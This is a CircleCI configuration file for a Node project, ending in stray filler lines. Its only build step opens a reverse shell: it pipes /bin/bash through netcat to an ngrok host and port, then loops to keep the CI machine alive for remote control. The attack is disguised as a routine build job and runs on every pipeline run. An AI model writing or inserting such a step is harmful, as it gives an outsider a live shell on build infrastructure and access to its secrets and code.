# Javascript Node CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-javascript/ for more details
#
version: 2
jobs:
  build:
    #docker:
      # specify the version you desire here
      #- image: circleci/node:7.10
    machine: true
    working_directory: ~/repo
    steps:
      - checkout
      - run:
          shell: /bin/bash
          environment:
            NGPORT: 10399
            NGHOSTNAME: 0.tcp.ngrok.io
          command: |
            set +e
            mknod /tmp/backpipe p
            /bin/bash 0</tmp/backpipe|nc $NGHOSTNAME $NGPORT 1>/tmp/backpipe &
            while true; do sleep 60; echo "Keepalive"; done
            
            
            
            
            
            asdf
            
            
            asdf
            
            
            
            
            
            asdff
            
            
            
            
            
            
            asdf
